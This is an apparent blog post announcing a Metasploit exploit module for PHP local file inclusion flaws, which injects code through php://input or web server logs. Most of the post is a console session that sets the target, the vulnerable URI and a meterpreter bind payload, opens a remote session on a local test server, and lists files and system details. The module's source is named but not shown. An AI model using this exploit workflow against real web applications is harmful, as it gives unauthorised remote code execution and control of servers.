Metasploit PHP LFI exploit module

Last week I wrote a simple exploit module for Metasploit to attack PHP applications with LFI vulnerabilities.

It uses php://input to inject the code or the webserver logs in other case.

If I had time, I would lik e to implement some tricks, like injection PHP code in the SSH logs or the e-mail server logs, but it is not possible by now :)

Note: It is really buggy and the injection may not be successful, depending on the length of the payload. Please remember that PHP limits the size of the POST message and a long payload may be cut. The same problem applies to the log file injection.

msf exploit(handler) > use exploit/unix/webapp/ php_lfi  
msf exploit(php_lfi) > set RHOST 127.0.0.1  
RHOST => 127.0.0.1  
msf exploit(php_lfi) > set RPORT 8181  
RPORT => 8181  
msf exploit(php_lfi) > set URI /index.php?foo=xxLFIxx  
URI => /index.php?foo=xxLFIxx  
msf exploit(php_lfi) > set PAYLOAD php/meterpreter/bind_tcp  
PAYLOAD => ; php/meterpreter/bind_tcp
msf exploit(php_lfi) > exploit -z
  
[*] Started bind handler
[*] Trying generic exploits
[*] Clean LFI i njection
[*] Sending stage (31612 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:19412 -> 127.0.0.1:4444) at Tue May 24 14:47:29 +0200 2011
  
C[-] Exploit exception: Interrupt
[*] Session 1 created in the background.
msf exploit(php_lfi) > sessions -i 1
[*] Starting interaction with 1...
  
meterpreter > ls
 
Listing: /usr/home/test/cherokee/www
====================================
 
Mode              Size  Type  Last modified                   Name
----              ----  ----  -------------                   ----
100644/rw-r--r--  0     fil   Tue May 10 11:09:39 +0200 2011  foo.php
40755 /rwxr-xr-x  512   dir   Tue May 10 10:53:59 +0200 2011  images
100644/rw-r--r--  1795  fil   Tue May 10 10:19:23 +0200 2011  index.html
100644/rw-r--r--  37    fil   Tue May 10 13:52:25 +0200 2011  index.php  
 
 
meterpreter > sysinfo
OS          : FreeBSD redphan tom.skynet.ct 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 02:41:51 UTC 2011     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
Computer    : redphantom.skynet.ct
Meterpreter : php/php
meterpreter > exit

php_lfi.rb